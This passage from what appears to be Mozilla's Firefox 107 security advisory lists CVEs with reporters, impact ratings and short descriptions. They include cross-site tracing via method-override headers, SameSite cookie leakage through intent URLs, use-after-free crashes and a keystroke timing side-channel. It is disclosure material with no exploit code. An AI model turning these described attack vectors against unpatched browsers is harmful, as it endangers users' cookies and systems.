Cross-Site Tracing occurs when a server will echo a request back via the Trace method, allowing an XSS attack to access to authorization headers and cookies inaccessible to JavaScript (such as cookies protected by HTTPOnly). To mitigate this attack, browsers placed limits on fetch() and XMLHttpRequest; however some webservers have implemented non-standard headers such as X-Http-Method-Override that override the HTTP method, and made this attack possible again. Firefox has applied the same mitigations to the use of this and similar headers.

**References**

*   Bug 1790311

**#CVE-2022-45412: Symlinks may resolve to partially uninitialized buffers**

Reporter

Armin Ebert

Impact

moderate

**Description**

When resolving a symlink such as file:///proc/self/fd/1, an error message may be produced where the symlink was resolved to a string containing unitialized memory in the buffer.  
_This bug only affects Firefox on Unix-based operated systems (Android, Linux, MacOS). Windows is unaffected._

**References**

*   Bug 1791029

**#CVE-2022-45413: SameSite=Strict cookies could have been sent cross-site via intent URLs**

Reporter

Axel Chong

Impact

moderate

**Description**

Using the S.browser_fallback_url parameter parameter, an attacker could redirect a user to a URL and cause SameSite=Strict cookies to be sent.  
_This issue only affects Firefox for Android. Other operating systems are not affected._

**References**

*   Bug 1791201

**#CVE-2022-40674: Use-after-free vulnerability in expat**

Reporter

Rhodri James

Impact

moderate

**Description**

A flaw in XML parsing could have led to a use-after-free causing a potentially exploitable crash.  
_In official releases of Firefox this vulnerability is mitigated by wasm sandboxing; versions managed by Linux distributions may have other settings._

**References**

*   Bug 1791598

**#CVE-2022-45415: Downloaded file may have been saved with malicious extension**

Reporter

Jefferson Scher and Jayateertha Guruprasad

Impact

moderate

**Description**

When downloading an HTML file, if the title of the page was formatted as a filename with a malicious extension, Firefox may have saved the file with that extension, leading to possible system compromise if the downloaded file was later ran.

**References**

*   Bug 1793551

**#CVE-2022-45416: Keystroke Side-Channel Leakage**

Reporter

Erik Kraft, Martin Schwarzl, and Andrew McCreight

Impact

moderate

**Description**

Keyboard events reference strings like "KeyA" that were at fixed, known, and widely-spread addresses. Cache-based timing attacks such as Prime+Probe could have possibly figured out which keys were being pressed.

**References**

*   Bug 1793676

**#CVE-2022-45417: Service Workers in Private Browsing Mode may have been written to disk**

Reporter

Kagami

Impact

moderate

**Description**

Service Workers did not detect Private Browsing Mode correctly in all cases, which could have led to Service Workers being written to disk for websites visited in Private Browsing Mode. This would not have persisted them in a state where they would run again, but it would have leaked Private Browsing Mode details to disk.

**References**

*   Bug 1794508

**#CVE-2022-45418: Custom mouse cursor could have been drawn over browser UI**

Reporter

Hafiizh

Impact

moderate

**Description**

If a custom mouse cursor is specified in CSS, under certain circumstances the cursor could have been drawn over the browser UI, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1795815

**#CVE-2022-46882: Use-after-free in WebGL**

Reporter

Irvan Kurniawan

Impact

moderate

**Description**

A use-after-free in WebGL extensions could have led to a potentially exploitable crash.  
_Note_: This advisory was added on December 13th, 2022 after we better understood the impact of the issue. The fix was included in the original release of Firefox 107.

**References**

*   Bug 1789371

**#CVE-2022-45419: Deleting a security exception did not take effect immediately**

Reporter

Ronald Crane

Impact

low

**Description**

If the user added a security exception for an invalid TLS certificate, opened an ongoing TLS connection with a server that used that certificate, and then deleted the exception, Firefox would have kept the connection alive, making it seem like the certificate was still trusted.

**References**

*   Bug 1716082

**#CVE-2022-45420: Iframe contents could be rendered outside the iframe**

Reporter

Suhwan Song of SNU CompSec Lab

Impact

low

**Description**

Using tables inside of an iframe, an attacker could have caused iframe contents to be rendered outside the boundaries of the iframe, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1792643

**#CVE-2022-45421: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers Andrew McCreight and Gabriele Svelto reported memory safety bugs present in Firefox 106 and Firefox ESR 102.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

**#CVE-2022-46883: Memory safety bugs fixed in Firefox 107**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers Gabriele Svelto, Yulia Startsev, Andrew McCreight and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 106. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.  
_Note_: This advisory was added on December 13th, 2022 after discovering it was inadvertently left out of the original advisory. The fix was included in the original release of Firefox 107.

**References**

*   Memory safety bugs fixed in Firefox 107

Tag

#ssl